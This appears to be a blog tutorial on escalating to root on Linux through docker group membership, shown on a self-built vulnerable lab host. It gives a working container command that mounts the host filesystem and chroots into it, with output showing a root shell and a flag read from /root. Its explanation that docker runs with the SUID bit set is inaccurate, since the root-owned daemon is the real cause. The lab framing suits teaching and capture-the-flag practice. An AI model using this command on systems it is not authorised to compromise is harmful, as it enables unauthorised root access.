Today we are going to learn how to Elevate our Privileges in a Linux system using Docker.
What is Docker?
Docker is a set of platform as a service products that uses OS-level virtualization to deliver software in packages called containers. Containers are isolated from one another and bundle their own software, libraries and configuration files; they can communicate with each other through well-defined channels.
How does docker lead to privesc
When an admin allows an un-privileged user access to the ‘docker’ group it allows us to make use of the docker CLI to create containers. Because docker runs with the SUID bit set we can use this to abuse the file system and elevate our privileges on out target
Before we continue
In order to continue we need to create a vulnerable host machine.
DO NOT DO THIS ON A MACHINE YOU DON’T HAVE PERMISSIONS TO COMPROMISE
To create a vulnerable host I created a Droplet on Digital ocean use This Link for $100 free credit.
Create a new Droplet with 2GB Ram using Debian
SSH to our new droplet
Install docker-ce using this guide
Now we need to add an unprivileged user
root@target:~# adduser affix Adding user ‘affix’ … sent invalidate(passwd) request, exiting sent invalidate(group) request, exiting Adding new group `useless’ (1002) … sent invalidate(passwd) request, exiting sent invalidate(group) request, exiting sent invalidate(group) request, exiting sent invalidate(passwd) request, exiting sent invalidate(group) request, exiting Adding new user ‘affix’ (1002) with group ‘affix’ … sent invalidate(passwd) request, exiting sent invalidate(group) request, exiting sent invalidate(passwd) request, exiting sent invalidate(group) request, exiting sent invalidate(passwd) request, exiting sent invalidate(group) request, exiting Creating home directory `/home/affix’ … Copying files from `/etc/skel’ … Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully Changing the user information for affix Enter the new value, or press ENTER for the default Full Name : Room Number : Work Phone : Home Phone : Other : sent invalidate(passwd) request, exiting sent invalidate(group) request, exiting sent invalidate(passwd) request, exiting Is the information correct? [Y/n]
Now add the new user to the docker group
usermod -aG docker affix
Now ssh to the target with the new user
Checking our access
Before we go further lets check we have access to the docker group.
affix@target:~$ id uid=1001(affix) gid=1001(affix) groups=1001(affix),999(docker)
Since we have access to the docker group lets try running the hello-world container
affix@target:~$ docker run hello-world Hello from Docker! This message shows that your installation appears to be working correctly. To generate this message, Docker took the following steps: 1. The Docker client contacted the Docker daemon. 2. The Docker daemon pulled the “hello-world” image from the Docker Hub. (amd64) 3. The Docker daemon created a new container from that image which runs the executable that produces the output you are currently reading. 4. The Docker daemon streamed that output to the Docker client, which sent it to your terminal. > To try something more ambitious, you can run an Ubuntu container with: > $ docker run -it ubuntu bash Share images, automate workflows, and more with a free Docker ID: https://hub.docker.com/ For more examples and ideas, visit: https://docs.docker.com/get-started/
Success! We can run containers, lets move on
Docker can be used to read files on our taget machine, This is useful to quickly grab file contents (for example quick flag grabbing). This can be done by mounting the directory you want to read from and reading the file
So what exactly did this do?
By using the -v flag we specified a volume to mount, in this case the */root *directory on the host was mounted to the /mnt directory on the container. Because docker has SUID we were able to mount a root owned directory in our container!
Lets get full root system access
Just like reading files we can mount the full file system of the host to gain access to the full system then
chroot to gain full privileges on the host.
affix@target:~$ docker run -it -v /:/mnt alpine chroot /mnt root@e63d48d18e03:/# ls /root/ flag.txt root@e63d48d18e03:/# cat /root/flag.txt 2590d7e9e24c67f41b485f16e2796b3d0e3128379b81e6ca290d67e99376e794 root@e63d48d18e03:/# cat /etc/issue Debian GNU/Linux 9 \n \l
As you can see we have full access to the system because we used chroot on the /mnt diectory, This essentially allowed us to use the host operating system!